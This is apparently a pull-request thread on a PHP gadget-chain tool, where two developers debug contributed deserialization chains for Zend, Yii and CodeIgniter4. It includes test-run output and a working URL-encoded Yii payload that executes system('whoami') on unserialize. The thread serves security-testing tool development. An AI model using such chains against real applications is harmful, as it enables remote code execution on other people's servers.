add some gadget chains that I had collected

[CyanM0un]

Hi, I sorted out a few gadget chains of some frameworks. I have manually checked all of them and some of them have passed the test-gc-compatibility script, which I have modified the corresponding version range in the chain.php. It seems like no small work for both of us :)

[cfreal]

Hello CyanM0un,

That's amazing work ! I'll try and integrate it in the upcoming weeks, as you have said it is a lot of work :)

Charles

[cfreal]

Hello,

Still haven't had time to check this amazing work. Will do in the upcoming weeks !

[cfreal]

Hello,

I have started working on your GCs, CyanM0un. Every ZendFramework payloads works except for the FI1:

$ php7.1 /tools/web/php/phpggc/phpggc ZendFramework/FI1 --test-payload
Trying to deserialize payload...
PHP Warning:  Exception caught by form: Plugin by name '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' was not found in the registry; used paths:
: 
Stack Trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2709): Zend_Loader_PluginLoader->load('/tmp/phpggc110c...')
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3458): Zend_Form->_getDecorator('/tmp/phpggc110c...', 'options')
#2 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2864): Zend_Form->_loadDecorator(Array, 'k')
#3 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2992): Zend_Form->getDecorators()
#4 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3010): Zend_Form->render()
#5 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php(263): Zend_Form->__toString()
#6 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#7 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128) in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php on line 3015
PHP Fatal error:  Uncaught Zend_Service_Twitter_Exception: Invalid method "detachldap" in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php:266
Stack trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128): Zend_Ldap_Node->detachLdap()
#2 [internal function]: Zend_Ldap_Node->__wakeup()
#3 /tools/web/php/phpggc/lib/test_payload.php(46): unserialize('O:14:"Zend_Ldap...')
#4 {main}
  thrown in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php on line 266
FAILURE: Payload did not trigger !

Any ideas why ?

[CyanM0un]

Oh, in the last gadget class (Zend_Loader_PluginLoader), the function load will append a '.php' suffix to the file path, so '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' may not be found.

[CyanM0un]

Oh, in the last gadget class (Zend_Loader_PluginLoader), the function load will append a '.php' suffix to the file path, so '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' may not be found.

maybe we should specify that the chain only include arbitrary PHP file

[cfreal]

Ok, fixed for Zend. Yii2 GCs work as well. Now, Yii/RCE3 tries to use PHPUnit_Extensions_Selenium2TestCase_Session, which is NOT included in the Yii 1.1.20 distribution.

[CyanM0un]

I used the command composer create-project yiisoft/yii=1.1.20 yii1 to create the project for finding GCs. To be honest, I am a little confused about the difference and what the standard way may be. Kindly request your opinion :)

[cfreal]

Ok, I used the package present in their github repository.

Do you by any chance still have your vendor/composer/installed.json? Now that I use your procedure, I get:

$ composer create-project yiisoft/yii=1.1.20 yii1
... blabla success
$ cd yii1
$ php7.4 /tools/web/php/phpggc/phpggc Yii/RCE3 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Call to undefined method DocBlox_Parallel_Worker::curl() in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php:194
Stack trace:
#0 /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php(173): PHPUnit_Extensions_Selenium2TestCase_Session->stop()
#1 [internal function]: PHPUnit_Extensions_Selenium2TestCase_Session->__destruct()
#2 {main}
  thrown in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php on line 194
FAILURE: Payload did not trigger !

[CyanM0un]

I don't think that's the problem ... I test it right now using the package and it worked, eg:

<?php
include("./vendor/autoload.php");
include("./framework/YiiBase.php");
$poc = "O%3A11%3A%22CDbCriteria%22%3A1%3A%7Bs%3A6%3A%22params%22%3BO%3A12%3A%22CMapIterator%22%3A3%3A%7Bs%3A16%3A%22%00CMapIterator%00_d%22%3BO%3A5%3A%22CForm%22%3A1%3A%7Bs%3A16%3A%22%00CForm%00_elements%22%3BO%3A44%3A%22PHPUnit_Extensions_Selenium2TestCase_Session%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00commands%22%3Ba%3A1%3A%7Bs%3A6%3A%22itemAt%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00url%22%3BO%3A40%3A%22PHPUnit_Extensions_Selenium2TestCase_URL%22%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00driver%22%3BO%3A23%3A%22DocBlox_Parallel_Worker%22%3A0%3A%7B%7D%7D%7Ds%3A19%3A%22%00CMapIterator%00_keys%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A18%3A%22%00CMapIterator%00_key%22%3Bs%3A6%3A%22whoami%22%3B%7D%7D";
unserialize(urldecode($poc)); // system('whoami')

the error was triggered in the PHPUnit_Extensions_Selenium2TestCase_Session#__destruct() progress, however the GC's function call should be triggered and finished in the CDbCriteria#__wakeup() progress, DocBlox_Parallel_Worker doesn't have the curl function because in the gadgets.php I simply pick up a class (DocBlox_Parallel_Worker) and assign it to the driver field of PHPUnit_Extensions_Selenium2TestCase_Session, which seems should not influence the command execution

[cfreal]

Ok, I was missing the YiiBase import :) Making progress!

[CyanM0un]

Ok, I was missing the YiiBase import :) Making progress!

Indeed a mount of work. 😂 Best respect for you

[cfreal]

Hello @CyanM0un !

I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:

$ composer create-project codeigniter4/appstarter=4.1.3 hello123

and

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip

Any ideas?

[CyanM0un]

Hello @CyanM0un !

I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:

$ composer create-project codeigniter4/appstarter=4.1.3 hello123

and

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip

Any ideas?

I used the second way, however, after I get the source code I usually use the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be concluded.

[CyanM0un]

Finally, thank you very much for your continued contact. I also admire your work on Iconv, set the charset to RCE! (Actually, all these gadget chains I have pulled requests were discovered by our automation tool. I personally think it works very well and I wonder if you could help promote it when we open-source it hahaha :)

[cfreal]

Hello @CyanM0un ! I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:

$ composer create-project codeigniter4/appstarter=4.1.3 hello123

and

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip

Any ideas?

I used the second way, however, after I get the source code I usually use the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be concluded.

This is what I am doing, but still, it does not work:

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
$ unzip v4.1.3.zip
$ cd framework-4.1.3
$ composer install
$ phpggc CodeIgniter4/RCE7 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Object of class __PHP_Incomplete_Class could not be converted to string in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php:378
Stack trace:
#0 /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php(266): CodeIgniter\Session\Handlers\DatabaseHandler->releaseLock()
#1 /dev/shm/framework-4.1.3/system/Cache/Handlers/RedisHandler.php(70): CodeIgniter\Session\Handlers\DatabaseHandler->close()
#2 [internal function]: CodeIgniter\Cache\Handlers\RedisHandler->__destruct()
#3 {main}
  thrown in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php on line 378
FAILURE: Payload did not trigger !

[CyanM0un]

Hello @CyanM0un ! I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:

$ composer create-project codeigniter4/appstarter=4.1.3 hello123

and

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip

Any ideas?

I used the second way, however, after I get the source code I usually use the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be concluded.

This is what I am doing, but still, it does not work:

$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
$ unzip v4.1.3.zip
$ cd framework-4.1.3
$ composer install
$ phpggc CodeIgniter4/RCE7 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Object of class __PHP_Incomplete_Class could not be converted to string in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php:378
Stack trace:
#0 /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php(266): CodeIgniter\Session\Handlers\DatabaseHandler->releaseLock()
#1 /dev/shm/framework-4.1.3/system/Cache/Handlers/RedisHandler.php(70): CodeIgniter\Session\Handlers\DatabaseHandler->close()
#2 [internal function]: CodeIgniter\Cache\Handlers\RedisHandler->__destruct()
#3 {main}
  thrown in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php on line 378
FAILURE: Payload did not trigger !

sorry, my URL is https://github.com/codeigniter4/CodeIgniter4/archive/refs/tags/v4.1.3.zip